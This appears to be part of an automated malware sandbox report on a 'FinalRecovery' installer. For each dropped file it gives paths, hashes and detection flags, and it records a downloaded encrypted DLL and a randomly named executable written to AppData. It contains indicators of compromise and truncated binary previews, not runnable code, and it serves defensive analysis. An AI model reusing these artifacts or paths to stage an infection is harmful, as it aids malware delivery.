Preview:	<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m

C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\is-K2TAS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
Category:	dropped
Size (bytes):	6452
Entropy (8bit):	4.734154041089812
Encrypted:	false
SSDEEP:	96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
MD5:	247D3A0C3B0C53CA33D032A561619495
SHA1:	F30570C48749FE427FACCBDF925048B149D22460
SHA-256:	783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
SHA-512:	9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.chm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	553405
Entropy (8bit):	7.979175020825392
Encrypted:	false
SSDEEP:	12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
MD5:	37E6EEA8C4E469F6439F3790166815DD
SHA1:	E0A3768F291CC7FCE178A001F0356D4FBA29D81F
SHA-256:	606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
SHA-512:	68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
Malicious:	false
Preview:	ITSF....`.......&..u.......\|.{.......".....\|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr

C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	1327103
Entropy (8bit):	6.349641677377942
Encrypted:	false
SSDEEP:	24576:p8sn21M2uJJKYcbmuBm/GAihHJTo+M/FLUTTb2ghAfrZLya6p4ZyQzAp:CsroY6mGAugUlgIbn
MD5:	88A9155EB9D85157634ED38D128C877B
SHA1:	1ED44B28A6652EC52EE93DE9DD18065625938D0B
SHA-256:	919DBDEDBDF4312EF0EF97A94343DEC76EEBA35FD50CE0A8B3885029750FAD06
SHA-512:	4A04B85C7DF8ECCDCF7740EB5B451B0696D3C109308766D4A1BB7288B7A13891AC6023EF81BB1754A97157DDC265AF40660AAB6C0E468FC5A4366A92BFD54E71
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-05LH6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	553405
Entropy (8bit):	7.979175020825392
Encrypted:	false
SSDEEP:	12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
MD5:	37E6EEA8C4E469F6439F3790166815DD
SHA1:	E0A3768F291CC7FCE178A001F0356D4FBA29D81F
SHA-256:	606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
SHA-512:	68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
Malicious:	false
Preview:	ITSF....`.......&..u.......\|.{.......".....\|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-587OJ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1949
Entropy (8bit):	4.915453283427292
Encrypted:	false
SSDEEP:	48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
MD5:	C0AE85DB30FE9027DBBF3BA758FA78BE
SHA1:	95E69DB95504A9F61D090690F32FB5D2F685C604
SHA-256:	CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
SHA-512:	DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
Malicious:	false
Preview:	.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-8DPO5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	data
Category:	dropped
Size (bytes):	1327103
Entropy (8bit):	6.349642071497365
Encrypted:	false
SSDEEP:	24576:O8sn21M2uJJKYcbmuBm/GAihHJTo+M/FLUTTb2ghAfrZLya6p4ZyQzAp:dsroY6mGAugUlgIbn
MD5:	686E27330B438E55788EE0A132194478
SHA1:	19AB1A4D5724A647984EDBBDAC465E98F7093B2F
SHA-256:	5D07E971A265774EE4C2ACF51CC41C815D247284C1A69AD05298FD54A7285FCF
SHA-512:	B54D7258AFEB1243445A7E344655D6A050E8F5F44FEBAFF3C5D62D6CEFBC49F948CD35A549D0AFD654310CA3E50951C23863007F94BF944C0957496C4DE96AA6
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	791040
Entropy (8bit):	6.608982798504157
Encrypted:	false
SSDEEP:	24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
MD5:	5C2FE7D4DDE65810152054F3C93C1815
SHA1:	2A19F3FAA78A5072068F7902DB19A248F11FA69B
SHA-256:	233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
SHA-512:	2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................\|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......\|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	723230
Entropy (8bit):	6.49191904892708
Encrypted:	false
SSDEEP:	12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
MD5:	D0E4493CD1CEC1B97F24BAB12A942543
SHA1:	CEE352F43F982FCB36A337D2C15FFDD28B04B80D
SHA-256:	C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
SHA-512:	D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	InnoSetup Log FgasoftFR FinalRecovery, version 0x30, 4340 bytes, 585948\user, "C:\Program Files (x86)\FgasoftFR\FinalRecovery"
Category:	dropped
Size (bytes):	4340
Entropy (8bit):	4.712609745266559
Encrypted:	false
SSDEEP:	96:AyWx5pJU+oIahqwOIhdc87ICSss/LBtbgfj1:AyWx5pJU+KEIhZICSsATgfJ
MD5:	15CF1A53B3514856C721F859E721DCBD
SHA1:	9BC828AC64112060DB3059F8EEC43722BE1AB041
SHA-256:	87159F502A66551DA4E65C05DB04E132CBC46B1D4370EEC9022499FBEAD59A84
SHA-512:	C49D7B0D200BC65FA055302353FAC99BBD379D81EF0D220411A379006D4A6A3AA716D36F0E9E2B1BD2AFD699941F5547E371AFB277B99800CFB290A379C5DB99
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................FgasoftFR FinalRecovery.........................................................................................................FgasoftFR FinalRecovery.........................................................................................................0...........%.................................................................................................................Wc(.......y.s.......N....585948.user.C:\Program Files (x86)\FgasoftFR\FinalRecovery.............:.Z.. ..........b.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.d

C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	723230
Entropy (8bit):	6.49191904892708
Encrypted:	false
SSDEEP:	12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
MD5:	D0E4493CD1CEC1B97F24BAB12A942543
SHA1:	CEE352F43F982FCB36A337D2C15FFDD28B04B80D
SHA-256:	C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
SHA-512:	D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
Malicious:	true
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	data
Category:	dropped
Size (bytes):	95248
Entropy (8bit):	7.998277474001343
Encrypted:	true
SSDEEP:	1536:1ajIVNDkCngyeaL3ZC7cjgn35QgjaeiPr6idOZAkOLfTRCaLQhAboaAkepTXnkY5:1vVpj3ZC72gnJQg2eikik4FC9/RX+f6
MD5:	636E3CA21F2541B5EE3AB9922A183C79
SHA1:	4B98C5432E534AF5FA17424C907E61CCFA6880D9
SHA-256:	9B97BF40465ACFBAB5D61EE45ECAC1E485A988ADC66E1A859F950605DC5677B9
SHA-512:	6AA99DFAB439063332383EBA737F34A5929353794245E8E4469EAEB2F7055889891D5A3F3CD3C9F20E37DCDEBFA78C5B5749F3BFDF40263970C880F047A0BDBB
Malicious:	false
Preview:	..'m..h.f{Q{..7_....l../....3`.p.$.....]....~@..Vt.%..eB.9a../_...G...\|.O..0HG`......`... k..x#.).....W..n...;.vmN....T..:l...........37r.../..X.1,..)..^.Y....N.{8........=..R..E.z.c..G.~X.0.}.b....rE..d...........(...M`.O.Y....?....D...R....N...C.{..E.\i.......:.h...#..\...d...O.."..N.yw.2.$..L.{....[w\....v.....zm....9.\|.q...p....j.WfQ.5h^rY.r.-..^}g.......]%...El.98Q..5F).F...).KBD..<0..l7...:..!.....L..P.l..oV....h..~;.G..K....-..={.....U.%...~.(.DE..8..df./...n...FC....~#.`.a........B.r..OJ^-...$.(`...N..k....P..h.....+.o...W.m.0...&j...E...Sip..p...U..Qx...q.[.."......U..n\|.Me_...PT.\|c.wt....5l...'..f..6n..,.+....4....J.\..+..\..C...:1.u..l.h...n.6..5P.-/........m70D..D._....?..9.V...M8..m.T.]4.i.IQN....BV..."h.......f......V.(..W..H.`,.V`..l.;...}.@.......*..rD....6OP.OC#^......=^7.R...tx..Q<..J..o.n..q.O..f.F....).Y2v..I...g.lnV.X..sm.>....^eO.l.....EB...u.m.E.\|.X...)b 7.K.ma."..%t..p.....U\.....L..A.:._.@...c3..[.m...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\stuk[1].htm

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.975418017913833
Encrypted:	false
SSDEEP:	3:iIxcsJE:iyE
MD5:	C0236A8F8EB0411CC373CD432E252990
SHA1:	49CA519830FADD97FA7BFB7C3404ED2DB29DF4E0
SHA-256:	375CD2A305050C0ECDC8EF9A417194DB2955F3C99B04C76F1B2CD5A88369A242
SHA-512:	3EDFDF13D9AE53C3DC77B299137C7F318B689F4880D72E50CF037F5A4F5C2A6CBC24CB5FE557C10F458CD1658B65E27EF994794FAB2D8E1562694E7DE5039E7E
Malicious:	false
Preview:	kvQoRqtcCyMtHmQyQXOUu

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\dll[1].htm

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dll[1].htm

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\plus[1].htm

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.026670007889822
Encrypted:	false
SSDEEP:	48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
MD5:	0EE914C6F0BB93996C75941E1AD629C6
SHA1:	12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:	4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:	A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................\|.......\|.......\|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	712704
Entropy (8bit):	6.4837542632664515
Encrypted:	false
SSDEEP:	12288:9QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kS0:+tCUA4arPEn37TzH7A6nw9yzeESUFWH/
MD5:	D76329B30DB65F61D55B20F36B56DA26
SHA1:	5E4C77B723AE8F05B3AE6AFEEE735A4355F00663
SHA-256:	229FBCB11EE7D1F082B6411610E95F726EEC4E6737E6B6392719DF4F0FE3FA1D
SHA-512:	A291AED0897315E88B6378B1DB10ADA05BDA8C1ECCAF73DE23F409FE61860EBD1DBB422063E00996584D3B4B100122931D5BBAB54A88951706D75EFCC660F70D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe

Download File

Process:	C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.20389308045717
Encrypted:	false
SSDEEP:	1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
MD5:	3FB36CB0B7172E5298D2992D42984D06
SHA1:	439827777DF4A337CBB9FA4A4640D0D3FA1738B7
SHA-256:	27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
SHA-512:	6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 60%
